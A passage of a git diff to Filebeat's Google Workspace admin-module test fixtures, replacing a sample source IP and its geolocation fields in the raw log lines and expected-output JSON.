+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -1508,26 +1400,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 12782,
+        "log.offset": 12755,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1548,7 +1436,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1563,27 +1451,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13120,
+        "log.offset": 13092,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1607,7 +1491,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1622,27 +1506,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 13577,
+        "log.offset": 13548,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1666,7 +1546,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1681,27 +1561,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 14053,
+        "log.offset": 14023,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
index 3ad1efedd6aa..0a2ae8ad7922 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
@@ -1,17 +1,17 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json
index efb0d4fefd70..4af8c73d15c7 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -25,23 +25,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -62,7 +58,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}",
